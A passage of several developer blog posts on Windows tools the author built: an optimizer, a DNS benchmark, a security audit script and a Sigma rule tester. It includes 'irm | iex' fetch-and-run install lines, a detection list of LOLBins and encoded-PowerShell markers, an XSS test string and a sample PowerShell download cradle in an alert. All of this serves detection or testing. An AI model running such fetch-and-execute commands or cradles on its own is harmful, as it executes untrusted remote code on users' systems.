The catch I didn't see coming: some registry keys don't exist until you set them. So the "previous value" is null. If you blindly restore null, you delete the key entirely. Sometimes that's fine. Sometimes you've just removed a default that Windows would have created on demand, and now an app behaves oddly because that key being absent means something specific. I ended up adding a flag in the undo file marking whether the original key existed or not. Boolean, not the worst code I've ever written, but it took me a full afternoon to figure out why some restores were leaving the system in a weirder state than before the optimizer ran.

I also added a health score. It's a 0-100 number based on services running, telemetry endpoints reachable, disk type vs. configured caching, firewall posture, and a few other things. Mostly it's there so the user has a before/after to look at. Nobody trusts a script that just says "done." They want a number that went up.

What's still rough:

The detection for "active session" is shallow. I'm checking process names. If you renamed Outlook.exe to something custom or you're running a different mail client, the script wouldn't notice. A real solution would hook into Windows session APIs and check what's holding open file handles or audio endpoints. I'm not there yet.

Gaming tweaks are mostly hard-coded. The script enables Game Mode and disables Game DVR if it sees a discrete GPU. Should probably check whether the user actually games. Right now if you have a 4090 and only use the machine for Excel, it'll still flip those bits. Harmless, mostly, but annoying that it lies a little on the report.

The hardware tier classifier is fragile. I divide systems into rough buckets based on CPU/RAM/storage type. The thresholds are arbitrary numbers I picked after testing on six machines. Probably wrong for anything outside that range. If you run it on a Surface tablet or a Steam Deck booted into Windows, results may be funky.

The SSD-specific tweaks (disabling Prefetch/Superfetch, ensuring TRIM is on) only fire if it detects an NVMe or SATA SSD via the storage cmdlets. Hybrid drives confuse it. I have one in a backup laptop and it always classifies it wrong.

If you want to try it, install is one line:

irm https://raw.githubusercontent.com/TiltedLunar123/Ultimate-Windows-System-Optimizer/main/run.ps1 | iex

Run it with -DryRun first. Always. The dry-run mode prints every change it would make without touching anything. I use this on every fresh machine before letting it commit. You can also do -Only "Privacy","Cleanup" to scope it to a few modules, or -Skip "Gaming" to leave specific stuff alone.

If it ever does something you don't like, -Undo will pull the most recent rollback file from %LOCALAPPDATA%\UWSO\ and put things back. The rollback files are plain JSON. You can read them, edit them, or delete them if you want a clean slate.

Repo and full module list here: https://github.com/TiltedLunar123/Ultimate-Windows-System-Optimizer

Issues and PRs welcome. Especially if you have a weird hardware setup that breaks the tier classifier. I want to know.

I tested 17 DNS resolvers from my apartment so you don't have to

TiltedLunar123 — Tue, 12 May 2026 09:16:37 +0000

i kept seeing "just use 1.1.1.1" and "switch to quad9 for security" in every networking thread, and nobody ever showed numbers. so i wrote a powershell script that actually benchmarks all of them on my machine and picks one based on weighted scoring.

repo: https://github.com/TiltedLunar123/DNS-Benchmark

the problem

my ISP's default DNS resolves twitter.com in ~38ms. cloudflare claims sub-15ms globally. is that real from comcast in metro detroit at 11pm? i had no idea. every "best DNS" article is the same five recommendations with no measurements behind them.

the existing tools i tried either:

only test latency (ignores reliability, ignores DNSSEC support)
need GUI clicks (i wanted something i could run from a script on a fresh windows install)
pick winners with no visible methodology

so i built one.

what it does

it pulls the active network adapter, runs queries against 17 public resolvers across 10 test domains, scores them, and offers to apply the winner. with a backup so you don't brick your DNS at 2am.

the 17 providers cover the main families: cloudflare (three variants including malware and family filtering), google, quad9 (filtered + unfiltered), opendns, adguard, comodo, cleanbrowsing, mullvad, control d, neustar, level3. enough to actually represent the space, not just three vendors.

the scoring choice that took me too long

i kept flip-flopping on weights. first attempt was pure latency. then i ran it a few times and noticed quad9 would win one run, cloudflare the next, depending on which domain happened to be hot in cache. so consistency had to matter.

settled on:

speed 40%
reliability 25% (% of queries that actually resolved without timeout)
security 25% (DNSSEC support, malware blocking, no logging claims)
consistency 10% (low jitter across runs)

the security score is partially hardcoded from each provider's published policy, which i'm not thrilled about. i don't have a great way to verify "no logging" claims from a script. open to suggestions there.

the install line

irm https://raw.githubusercontent.com/TiltedLunar123/DNS-Benchmark/master/install.ps1 | iex

yes, irm | iex is the powershell equivalent of curl | bash and yes you should read the script before running it. the install.ps1 is under 100 lines. takes about 30 seconds to skim.

sample output

results come back as letter grades, A+ through F, with the top 3 starred. cloudflare 1.1.1.1 won on my home connection but quad9 came within 2ms and scored higher on security weighting. it was closer than the internet would have you believe.

what's broken

it assumes you have admin. if you don't, it fails late instead of checking up front. fixing.
the 10 test domains are hardcoded. should probably read from a config file or accept a -Domains param.
no ipv6 support yet. on the list.
jitter analysis uses standard deviation which is fine for normal cases but gets weird when a provider has one big outlier query. probably should use median absolute deviation.

flags supported: -TestCount, -SkipApply, -Report (markdown out), -Restore (back to your previous DNS if the new one feels wrong).

the thing i actually learned

the "best DNS" depends way more on your geographic distance to the resolver's anycast nodes than on the brand. mullvad scored surprisingly high for me, probably because their detroit-area peering is good. i would never have guessed that without measuring.

if you run it on your network and get a different winner, that's the point.

repo's MIT, PRs welcome, especially anyone who knows the right way to verify logging policies from a script. https://github.com/TiltedLunar123/DNS-Benchmark

Auditing Windows security from a Python script, no pip install needed

TiltedLunar123 — Sun, 10 May 2026 09:17:16 +0000

I had a problem. I wanted a Windows security audit script I could drop on any machine, run as admin, and walk away with a readable report. Just a single .py file. No pip install, no virtualenv, no "wait, do you have Python 3.10 or what."

The catch is that "real" Windows auditing tools usually pull in pywin32, wmi, or some chunky vendor SDK. None of that flies on a locked down workstation. So I tried writing the whole thing on the standard library.

That is what WinRecon turned into. 20 checks, single Python module, no dependencies past stdlib.

Here's how the dependency-free constraint shaped the architecture.

For registry reads I went straight to winreg. Anything that needs Windows tooling goes through subprocess with the actual built-in binaries (netstat, net, sc query, wmic, and PowerShell for Defender and audit policy queries). It is not elegant. You end up parsing CLI text output a lot. But it works on a fresh Windows 11 box with nothing installed.

Example. Getting Defender status without pywin32. PowerShell already returns it as JSON, you just have to ask:

def get_defender_status():
    cmd = [
        "powershell", "-NoProfile", "-Command",
        "Get-MpComputerStatus | ConvertTo-Json"
    ]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
    if result.returncode != 0:
        return None
    return json.loads(result.stdout)

Subprocess plus ConvertTo-Json got me out of a hole on probably half the checks. WMI bindings would have been faster but the trade is dependencies, and I wanted the script to just run.

The 20 checks cover the obvious stuff (firewall state, RDP config, password policy, open ports, BitLocker, Credential Guard, Secure Boot, audit policy, antivirus status) plus the stuff a SOC analyst actually wants to see: suspicious scheduled tasks, sketchy startup entries, weird PowerShell flags. The scheduled task check looks for things like encoded payloads (-enc, frombase64string), LOLBins (certutil, bitsadmin, regsvr32), -windowstyle hidden, IEX, and C2 indicators like ngrok or pastebin URLs. Cheap pattern matching but it catches the lazy stuff.

Output is a self-contained HTML report. All CSS inlined, no external assets. You can email it, drop it on a fileshare, open it on a stripped down server, and it renders. There is also a JSON file for anyone who wants to parse findings into a SIEM later.

Scoring is dumb on purpose. Each finding is CRITICAL (-20), WARNING (-10), or PASS/INFO (0). Start at 100, deduct, end with a letter grade A through F. The point is not "is this CVSS-accurate." The point is that you can hand the HTML to a non-security person and they get it in three seconds.

What broke along the way.

The biggest pain was admin vs standard user. Some checks (BitLocker, audit policy, credential guard, firewall details) just fail or return degraded results without elevation. I wanted them to fail loudly without crashing the whole run, so each check returns a Finding object with status PASS, WARNING, CRITICAL, or INFO, and the runner aggregates them. If one check explodes, the others still finish. Took me a couple iterations to stop having one bad subprocess timeout kill the whole report.

The other thing I underestimated: HTML escaping. All those scheduled task names and registry values go straight into the report. If a malicious task name had <script> in it, my report would happily render it. So I added pytest coverage specifically for the escape path, and a test that drops <img src=x onerror=alert(1)> into a finding to make sure it comes out as text. Coverage is at 80% min, which feels right for a tool you might run on a real machine.

Things I would still fix.

The grading is too coarse. A box with one critical finding and 19 passes lands a C. That is fine for "is this safe" but it overweights single critical findings. I want to weight them by category eventually, so a missing antivirus is not the same as a deprecated SMBv1 enabled.

Subprocess timeouts also have a default of 60s per check, which is fine on a normal machine and miserable on a slow domain-joined one. I should make them adaptive.

The suspicious-pattern detector is regex on strings, which means false positives. A scheduled task named "regsvr32-cleanup" gets flagged. The custom keywords file partially fixes this but I should ship a default trusted-paths list that covers common vendor software.

If you have a Windows machine and 30 seconds:

git clone https://github.com/TiltedLunar123/WinRecon
cd WinRecon
python -m winrecon

It writes the HTML to ./winrecon_reports/. Open it. Tell me which check is wrong on your box. That is actually the most useful feedback I can get right now.

Repo: https://github.com/TiltedLunar123/WinRecon

Testing Sigma Rules Against Local Logs Without a SIEM

TiltedLunar123 — Wed, 06 May 2026 13:23:48 +0000

I'd written a few Sigma rules for my home lab and wanted to know if they actually fired on real Sysmon events. The standard answer is "deploy to Wazuh and replay logs". That's a lot of overhead when I just want to confirm a regex matches.

So I built SIEMForge. It's a Python CLI that loads Sigma YAML files, parses the detection logic, and matches it against JSON, JSONL, syslog, or CSV log files locally. No SIEM required.

This post is the messy version of how it came together. The final code is on GitHub at github.com/TiltedLunar123/SIEMForge.

The problem

I had ten Sigma rules covering things like LSASS dumps, suspicious PowerShell, and registry persistence. To validate them I'd been:

starting Wazuh in a VM
shipping a Sysmon JSONL via filebeat
SSHing to the manager and tailing alerts.log
realizing the rule didn't fire because I had a typo in the field name

Round trip on a single rule edit was about 4 minutes. For ten rules iterating through false positive checks, the math gets bad.

What I actually wanted: siemforge --scan events.json and a list of which rules fired with which event ID.

First attempt: just regex everything

Naive plan. Sigma rules look simple. They have a detection block with selection, filter, and condition keys. The condition usually says selection and not filter. How hard can it be?

Hard. The condition language allows:

selection
selection and filter
selection or filter
selection and not filter
1 of selection*
all of them

I started with a bare boolean parser that handled and, or, not. About 70% of my rules worked. The 1 of selection* ones broke. So did the wildcards in field values like CommandLine|contains: '*-ep bypass*'.

I rewrote the matcher around a small expression tree instead of regex. Each detection block compiles to a callable: given an event dict, return bool. The condition is parsed once at load and evaluated per event.

def compile_selection(selection: dict) -> Callable[[dict], bool]:
    matchers = []
    for key, value in selection.items():
        field, _, modifier = key.partition("|")
        matcher = build_field_matcher(field, modifier or "equals", value)
        matchers.append(matcher)
    return lambda event: all(m(event) for m in matchers)

build_field_matcher handles contains, startswith, endswith, and re modifiers. Wildcards in raw values (*-ep bypass*) get translated to a contains check at compile time.

The field name problem

Sysmon JSON via Wazuh ships fields as process.command_line. Raw Sysmon EVTX via evtxecmd ships them as CommandLine. Splunk ships them as CommandLine too but inside a _raw blob.

My rules were written against the EVTX naming. When I tested against the Wazuh-formatted JSON, nothing matched. Took me an hour to figure out why.

Two options: rewrite all the rules, or normalize the events. I went with normalize. There's a field_aliases.yml that maps common variants:

CommandLine:
  - process.command_line
  - data.win.eventdata.commandLine
  - winlog.event_data.CommandLine

The scanner tries each alias when the canonical field is missing. Not pretty but it stopped me from owning two copies of every rule.

What actually works

After three rewrites the scanner runs on a 4823-event Sysmon dump in under a second. Output looks like:

[*] Scanning /var/log/sysmon/events.jsonl (jsonl, 4823 events)

[ALERT] Rule: Suspicious PowerShell Download Cradle
        Technique: T1059.001
        Event #312 | 2026-03-14T08:41:02Z
        CommandLine: powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(...)"

[*] Scan complete: 2 alerts across 4823 events

That's the round trip I wanted. Edit a rule, rerun, see if it fires. About 2 seconds end to end now.

The Sigma to Splunk/Elastic/Kibana converter is a side benefit. Same compiled tree, different emit step.

What's broken

Plenty.

The syslog parser is held together with tape. RFC 3164 vs RFC 5424 timestamp detection works on the obvious cases, but if the host writes a non-standard date format (looking at you, pfSense) fields end up mis-split. I have a TODO to switch to pyparsing instead of my hand-rolled tokenizer.

The MITRE coverage matrix is per-rule, not per-technique. It tells you which rule covers which technique, but not which techniques you have zero coverage on. That's the actually useful direction. v3.2 work.

Sigma's 1 of operator is implemented for selection groups but not for conditions like 1 of selection_*. About 10% of public Sigma rules use that pattern, so the rule loader currently warns and skips them.

What I'd do differently

I should have started with the reference Sigma backend (pySigma) instead of writing a parser from scratch. By the time I realized that, I'd already shipped two converters and ripping it out felt worse than maintaining the homegrown one. If I started today I'd wrap pySigma and add my own scanner on top.

Test data. I waited too long to build sample log files for each technique. Now there's a samples/ directory with process injection, service installation, user creation, CSV examples, and a clean baseline for false positive checks. Should have been there from commit one.

CI. I added it at v3.0 after a regression broke the Splunk converter on Windows. 138 tests run on every push now. Worth the upfront cost.

Use it

git clone https://github.com/TiltedLunar123/SIEMForge.git
cd SIEMForge
pip install pyyaml
python -m siemforge --scan samples/events.jsonl

If you write Sigma rules and hate the deploy-test loop, give it a try. Issues and PRs welcome. There's a CONTRIBUTING file with rule submission guidelines.

Repo: https://github.com/TiltedLunar123/SIEMForge